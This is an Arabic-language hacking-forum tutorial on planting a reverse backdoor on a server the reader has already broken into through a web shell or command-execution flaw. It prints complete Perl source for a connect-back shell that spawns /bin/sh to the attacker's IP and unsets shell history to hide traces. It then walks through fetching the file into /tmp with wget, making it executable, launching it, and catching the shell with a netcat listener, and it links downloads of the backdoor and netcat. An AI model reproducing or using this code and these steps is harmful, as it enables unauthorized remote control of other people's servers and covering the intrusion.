Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: كيف ترفع باك دور على السيرفر


Senior Member

Status: Offline
Posts: 319
Date:
كيف ترفع باك دور على السيرفر
Permalink Closed



------------------

السلام عليكم ورحمه الله وبركاتة


------------------

إهــــداء هـــذا آلـــشرح إلـــى إخـــوى ألعزيـــز Eddy_Back0o

------------------


اليوم ياشباب بشرح كيف نرفع باكدور علي السيرفر

وراح نستخدم باكدور عكسي والكثير منا بعد

رفع الباكدور لا يستطيع الاتصال به وذلك لوجود

فايرول يمنع ذلك والحل هو استخدام باكدور

عكسي وهذا ماسوف نشرحه لهذا اليوم


------------------


بسم الله الرحمن الرحيم

------------------

لنفترض انك استطعت اختراق موقع ورفع شل عليه وبخاطرك ترفع باكدور ولا عرفت كيف

بقول لك ولا يهمك اليوم بشرح لك كيف ترفع الباكدور علي السيرفر المخترق

اول شيء بقول لك وانت بالشل او باي ثغره تسمح بتطبيق اوامر لينكس

اذهب لـtmp وراح تسألني وتقول يادكتور جرح كيف نروح له ؟

بقول لك اكتب الامر التالي عشان تروح للتمب

cd /tmp;pwd

بتقول لي ليش كتبنا الامر pwd والامر cd و ;

راح اجاوبك واقول لك كل امر يستخدم بشنو

cd = امر يستخدم للانتقال بين المجلدات

pwd = يستخدم لمعرفة مكان تواجدك

; = للربط بين الاوامر

طيب تمام الحين طلع لنا

/tmp

يعني الحين احنا بمجلد التمب طيب خلنا نكتب الامر which wget وادري بتسألني وتقول ليش نكتبه

بقول لك عشان نشوف نقدر نسحب ملف للسيرفر ولا لا

تمام طلع لنا

/usr/bin/wget

يعني نقدر نسحب ملف للسيرفر

الحين احنا نبي نسحب الباكدور للسيرفر

اول شيء هذا هو الباكدور العكسي

------------------




رمز:#!/usr/bin/perl

use IO::Socket;

#IRAN HACKERS SABOTAGE Connect Back Shell

#code by:LorD

#We Are :LorD-C0d3r-NT

#

#lord@SlackwareLinux:/home/programing$ perl dc.pl

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#Usage: dc.pl [Host] [Port]

#

#Ex: dc.pl 127.0.0.1 2121

#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#

  • Resolving HostName

    #
  • Connecting... 127.0.0.1

    #
  • Spawning Shell

    #
  • Connected to remote host



    #bash-2.05b# nc -vv -l -p 2121

    #listening on [any] 2121 ...

    #connect to [127.0.0.1] from localhost [127.0.0.1] 2121

    #--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

    #

    #--==Systeminfo==--

    #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux

    #

    #--==Userinfo==--

    #uid=1001(lord) gid=100(users) groups=100(users)

    #

    #--==Directory==--

    #/root

    #

    #--==Shell==--

    #

    $system = '/bin/sh';

    $ARGC=@ARGV;

    print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";

    if ($ARGC!=2) {

    print "Usage: $0 [Host] [Port] \n\n";

    die "Ex: $0 127.0.0.1 2121 \n";

    }

    use Socket;

    use FileHandle;

    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";

    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";

    print "
  • Resolving HostName\n";

    print "
  • Connecting... $ARGV[0] \n";

    print "
  • Spawning Shell \n";

    print "
  • Connected to remote host \n";

    SOCKET->autoflush();

    open(STDIN, ">&SOCKET");

    open(STDOUT,">&SOCKET");

    open(STDERR,">&SOCKET");

    print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";

    system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;

    echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");

    system($system);

    #EOF
    ------------------


    بتقول لي مافهمت والله لحد الآن شيء

    بقول لك انسخ الكود اللى حطيته فوق واحظفة بامتداد pl

    يعني مثلا اسم الملف نبغاه backdoor راح يكون كذا

    Backdoor.pl

    وتفضل حمله جاهز من هنا

    http://www.drr.cc/up10/backdoor.zip

    وايضا موجود بملف الصفحه

    تمام الحين حفظنا الباكدور بقول لك ارفعه علي موقعك المجانى

    عشان نقدر نسحبه علي السيرفر ونفترض انك رفعته ورابطه صار كذا

    www.xxx.com/backdoor.pl

    xxx = موقعك المجانى

    تمام الحين بقول لك اكتب الامر التالي

    wget www.xxx.com/backdoor.pl

    تمام ظهر لنا التالي

    backdoor.pl

    يعني الباكدور والحمدلله تم رفعه علي السيرفر

    بقول لك الحين خلنا نعطيه تصريه رقم 777

    وادري يمكن يدور براسك سؤال ليش مافكينا الضغط عن الباكدور !

    بقول لك احنا رفعناه وهو مو مضغوط

    الحين خلنا نعطيه التصريح 777

    بتقول لي كيف راح اجاوبك واقول لك كذا

    chmod 777 backdoor.pl

    تمام بتقول لي كيف اعرف انى عطيته التصريح رقم 777

    بقول لك اكتب الامر التالي

    ls –l

    وادري بتقول وش هالامر بقول لك يعرض الملفات مع تصاريحها وقد ذكرت هالامر قبل

    المهم راح يظهر جمب الباكدور اللى رفعناه التالي

    -rwxrwxrwx

    يعني تمام الحين الباكدور يملك تصريح رقم 777

    الحين اقول لك روح اتصنت علي البورت بالنت كات

    بتقول لي ما اعرف يادكتور جرح

    ولا يهمك راح اعلمك كيف تتصنت بالنت كات

    اول شيء حمل النت كات

    للتحميل ..

    http://www.me3ady.com/up/up/netcat.zip

    الان ضعها بمجلد السي مثلا ( تقدر تحطها وين ماتبي )

    بعدها روح لى استارت بعدها رين بعدها اكتب cmd

    Start -> run -> cmd

    تمام الان احنا بالدوس بقول لك اكتب

    cd\

    تمام الحين احنا بالسي وشوف الصوره



    تمام الحين بقول لك اكتب التالي

    nc –vv –l –p 2121

    مثل الصوره التاليه



    بتقول يادكتور وش سوينا

    بقول لك يالغالي الحين احنا طلبنا من النت كات تتصنت

    علي البورت 2121 اللى اهو بورت الباكدور

    اللى سحبناه علي السيرفر المخترق

    طيب الحين تمام نروح للشل او الثغره اللى تطبق اوامر اللينكس

    يعني الحين انا مورافع شل علي الموقع لكن عندى ثغره تطبق اوامر اللينكس

    يعني ما اقدر ارفع باكدور بقول لك لا تقدر ترفع باكدور سوا من الشل

    او من اى ثغره تطبق اوامر اللينكس المهم نكتب الامر التالي سوا كنا بالشل

    او بالثغره اللى تطبق اوامر اللينكس والامر هو

    Perl backdoor.pl [your tip] 2121

    وراح اشرح لك وش سوينا

    Perl = أمر الترجمه

    Backdoor.pl = اسم الباكدور اللى سحبناه علي السيرفر واللى افترضنا اسمه backdoor.pl

    Your ip = الاي بي مالك

    2121 = بورت الباكدور اللى سحبناه علي السيرفر

    شوف الصوره طبقته علي ثغره تسمح بتطبيق اوامر اللينكس وانا بالمتصفح



    بعدها نضغط انتر وراح يطلع لنا كذا بالنت كات التالي



    تمام الحين الباكدور شغال والحمد لله

    وعطانى هويتي مع بيانات السيرفر

    وان شاء الله بالدروس القادمه راح اشرح

    كيف ندور localroot لاصدار الكيرنل

    وكيف ناخذ روت

    ------------------

    ملاحظات ..

    · لم اشرح سوى شرح بسيط جدا عن الباكدور

    · بعض الباكدورات تحتاج ترجمه بالامر التالي gcc –o filename filename.c

    · لو رفعت الباكدور وصلاحيتك nobady تبي نفس ماهي ماتغير

    ------------------

    بالنهايه اتمنى انه المبتدئين استفادو من الشرح البسيط

    وانا طولت الموضوع مع انه مايطول لكن عشان

    المبتدئين يفهمون عدل وكل الشكر لاخوى سعودي & اخوى القبطآن

    لانى استفد منهم والله بدرجه كبيره

    وان شاء الله لنا عوده بدروس اخري

    ------------------

    ###########
    الحقوق محفوظة لـ

    Dr.Jr7

    ###########



__________________
Page 1 of 1  sorted by
 
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard